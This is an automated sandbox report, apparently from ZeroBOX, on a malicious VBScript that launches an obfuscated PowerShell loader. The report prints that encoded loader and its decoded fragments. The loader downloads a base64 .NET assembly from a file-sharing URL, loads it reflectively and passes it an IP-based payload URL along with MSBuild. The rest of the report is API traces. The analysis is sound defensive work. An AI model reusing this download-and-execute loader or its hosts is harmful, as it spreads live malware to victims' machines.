Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	March 3, 2025, 2:44 p.m.	March 3, 2025, 2:47 p.m.

Size	173.1KB
Type	UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5	`46515ec0ad1711350ac2cbfc5cf23243`
SHA256	`043545d1eb3eca5d8aa58e4e9e863c3c2340f46102d2c9dce2dcf71d41466d68`
CRC32	`CEBA0031`
ssdeep	`1536:G9bjgvyD1sRtfECiMwV5TohyRJ1vr2LBJpUD:QpeRGTtohyRJ1vr2LBJpUD`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Tuesdayconstraints.vbs
652
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#BC#GE#YwBj#Gg#YQBu#GE#b#Bp#GE#bgBz#C##PQ#g#Cc#d#B4#HQ#Lg#0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DY#ZQBz#GE#Yg#v#Dc#MQ#u#D##Mg#y#C4#Mw#u#DI#OQ#x#C8#Lw#6#H##d#B0#Gg#Jw#7#CQ#Z#By#HU#ZwBn#Gk#ZQBz#HQ#I##9#C##J#BC#GE#YwBj#Gg#YQBu#GE#b#Bp#GE#bgBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#BE#G8#bgBj#GE#cwB0#GU#cg#g#D0#I##n#Gg#d#B0#H##cw#6#C8#Lw#x#D##M##3#C4#ZgBp#Gw#ZQBt#GE#aQBs#C4#YwBv#G0#LwBh#H##aQ#v#GY#aQBs#GU#LwBn#GU#d##/#GY#aQBs#GU#awBl#Hk#PQBF#FM#WQBU#Gk#V#BS#DM#Tw#w#DM#RQ#1#HE#cgBN#G4#SQB5#Hk#VwB0#Fk#Zg#1#E8#TQBG#FU#M#Bt#GE#awB4#E0#dQ#w#GU#U#Bx#FI#UgBK#E4#aQBj#E4#agBD#DM#NgBh#Dg#V##y#Go#RwBm#Fc#V##2#EY#RQBC#Go#NQBz#CY#c#Br#F8#dgBp#GQ#PQ#z#DQ#Mg#4#D##MwBk#DE#YwBj#DQ#ZQ#z#GI#O##w#DE#Nw#0#D##Ng#2#Dc#M##1#D##O##w#GE#NQBl#GY#Jw#7#CQ#c#Bh#HI#aQB0#Gk#ZQBz#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#c#Bw#HI#YQBp#HM#ZQBy#HM#I##9#C##J#Bw#GE#cgBp#HQ#aQBl#HM#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#R#Bv#G4#YwBh#HM#d#Bl#HI#KQ#7#CQ#c#By#G8#YwBy#GE#cwB0#Gk#bgBh#HQ#bwBy#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bh#H##c#By#GE#aQBz#GU#cgBz#Ck#Ow#k#GI#b#Bl#H##a#Bh#HI#YQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#c#Bp#GM#cgBv#Gc#b#B5#GM#aQBv#G4#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#cwB1#Gk#YwBp#GQ#ZQ#g#D0#I##k#H##cgBv#GM#cgBh#HM#d#Bp#G4#YQB0#G8#cgBz#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YgBs#GU#c#Bo#GE#cgBh#Ck#Ow#k#G0#ZQBh#GQ#bwB3#C##PQ#g#CQ#c#By#G8#YwBy#GE#cwB0#Gk#bgBh#HQ#bwBy#HM#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bw#Gk#YwBy#G8#ZwBs#Hk#YwBp#G8#bg#p#Ds#J#Bz#HU#aQBj#Gk#Z#Bl#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bQBl#GE#Z#Bv#Hc#I##t#Gc#d##g#CQ#cwB1#Gk#YwBp#GQ#ZQ#7#CQ#cwB1#Gk#YwBp#GQ#ZQ#g#Cs#PQ#g#CQ#YgBs#GU#c#Bo#GE#cgBh#C4#T#Bl#G4#ZwB0#Gg#Ow#k#GE#ZwBr#Gk#cwB0#HI#bwBk#G8#bg#g#D0#I##k#G0#ZQBh#GQ#bwB3#C##LQ#g#CQ#cwB1#Gk#YwBp#GQ#ZQ#7#CQ#YwBy#Hk#cwB0#GE#b##g#D0#I##k#H##cgBv#GM#cgBh#HM#d#Bp#G4#YQB0#G8#cgBz#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#HM#dQBp#GM#aQBk#GU#L##g#CQ#YQBn#Gs#aQBz#HQ#cgBv#GQ#bwBu#Ck#Ow#k#GM#bwBt#H##YQBn#Gk#bgBh#HQ#ZQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bj#HI#eQBz#HQ#YQBs#Ck#Ow#k#Ho#bwBh#G4#d#Bo#G8#Z#Bl#G0#aQBj#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#H##YQBn#Gk#bgBh#HQ#ZQ#p#Ds#J#Bn#HI#YQB2#Gk#Z#Bh#HQ#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#GQ#cgB1#Gc#ZwBp#GU#cwB0#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBN#FM#QgB1#Gk#b#Bk#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
  2132

Name	Response	Post-Analysis Lookup
1007.filemail.com	A 142.215.209.72 CNAME ip.1007.filemail.com	142.215.209.72

IP Address	Status	Action
142.215.209.72	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 3, 2025, 2:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 3, 2025, 2:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 3, 2025, 2:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 3, 2025, 2:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 3, 2025, 2:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 3, 2025, 2:44 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 3, 2025, 2:44 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 3, 2025, 2:44 p.m.			0	0

Command line console output was observed (20 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 3, 2025, 2:44 p.m.	buffer: True console_handle: 0x00000013	1	1
WriteConsoleW March 3, 2025, 2:44 p.m.	buffer: Exception calling "Invoke" with "2" argument(s): "Could not load file or assemb console_handle: 0x00000023	1	1
WriteConsoleW March 3, 2025, 2:44 p.m.	buffer: ly 'System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' console_handle: 0x0000002f	1	1
WriteConsoleW March 3, 2025, 2:44 p.m.	buffer: or one of its dependencies. The system cannot find the file specified." console_handle: 0x0000003b	1	1
WriteConsoleW March 3, 2025, 2:44 p.m.	buffer: At line:1 char:962 console_handle: 0x00000047	1	1
WriteConsoleW March 3, 2025, 2:44 p.m.	buffer: + $Bacchanalians = 'txt.44444444444444444444444444446esab/71.022.3.291//:ptth'; console_handle: 0x00000053	1	1
WriteConsoleW March 3, 2025, 2:44 p.m.	buffer: $druggiest = $Bacchanalians -replace '#', 't';$Doncaster = 'https://1007.filema console_handle: 0x0000005f	1	1
WriteConsoleW March 3, 2025, 2:44 p.m.	buffer: il.com/api/file/get?filekey=ESYTiTR3O03E5qrMnIyyWtYf5OMFU0makxMu0ePqRRJNicNjC36 console_handle: 0x0000006b	1	1
WriteConsoleW March 3, 2025, 2:44 p.m.	buffer: a8T2jGfWT6FEBj5s&pk_vid=342803d1cc4e3b80174066705080a5ef';$parities = New-Objec console_handle: 0x00000077	1	1
WriteConsoleW March 3, 2025, 2:44 p.m.	buffer: t System.Net.WebClient;$appraisers = $parities.DownloadData($Doncaster);$procra console_handle: 0x00000083	1	1
WriteConsoleW March 3, 2025, 2:44 p.m.	buffer: stinators = [System.Text.Encoding]::UTF8.GetString($appraisers);$blephara = '<< console_handle: 0x0000008f	1	1
WriteConsoleW March 3, 2025, 2:44 p.m.	buffer: BASE64_START>>';$picroglycion = '<<BASE64_END>>';$suicide = $procrastinators.In console_handle: 0x0000009b	1	1
WriteConsoleW March 3, 2025, 2:44 p.m.	buffer: dexOf($blephara);$meadow = $procrastinators.IndexOf($picroglycion);$suicide -ge console_handle: 0x000000a7	1	1
WriteConsoleW March 3, 2025, 2:44 p.m.	buffer: 0 -and $meadow -gt $suicide;$suicide += $blephara.Length;$agkistrodon = $meado console_handle: 0x000000b3	1	1
WriteConsoleW March 3, 2025, 2:44 p.m.	buffer: w - $suicide;$crystal = $procrastinators.Substring($suicide, $agkistrodon);$com console_handle: 0x000000bf	1	1
WriteConsoleW March 3, 2025, 2:44 p.m.	buffer: paginate = [System.Convert]::FromBase64String($crystal);$zoanthodemic = [System console_handle: 0x000000cb	1	1
WriteConsoleW March 3, 2025, 2:44 p.m.	buffer: .Reflection.Assembly]::Load($compaginate);$gravidate = [dnlib.IO.Home].GetMetho console_handle: 0x000000d7	1	1
WriteConsoleW March 3, 2025, 2:44 p.m.	buffer: d('VAI').Invoke <<<< ($null, [object[]] @($druggiest,'','','','MSBuild','','',' console_handle: 0x000000e3	1	1
WriteConsoleW March 3, 2025, 2:44 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000000fb	1	1
WriteConsoleW March 3, 2025, 2:44 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodTargetInvocation console_handle: 0x00000107	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffbd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffc50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffc50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffc50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002004d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002004d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002004d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002004d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002004d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002004d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffc50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffc50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffc50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffd90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffd90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffd90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00200590 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffd90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffd90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffd90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffd90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffd90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffd90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffd90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffe10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffe10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffe10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffe10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffe10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffe10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffe10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffe10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffe10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffe10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffe10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffe10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffe10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x001ffe10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00200150 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00200150 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04e3e8b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04e3e8b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04e3e8b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04e3e8b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04e3e8b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:44 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04e3e8b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 3, 2025, 2:44 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET https://1007.filemail.com/api/file/get?filekey=ESYTiTR3O03E5qrMnIyyWtYf5OMFU0makxMu0ePqRRJNicNjC36a8T2jGfWT6FEBj5s&pk_vid=342803d1cc4e3b80174066705080a5ef

Performs some HTTP requests (1 event)

request

GET https://1007.filemail.com/api/file/get?filekey=ESYTiTR3O03E5qrMnIyyWtYf5OMFU0makxMu0ePqRRJNicNjC36a8T2jGfWT6FEBj5s&pk_vid=342803d1cc4e3b80174066705080a5ef

Allocates read-write-execute memory (usually to unpack itself) (50 out of 171 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 2228224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02790000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02970000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02971000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02972000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02557000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02502000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02555000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02503000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02504000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02505000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02506000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02507000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02508000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:44 p.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02509000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
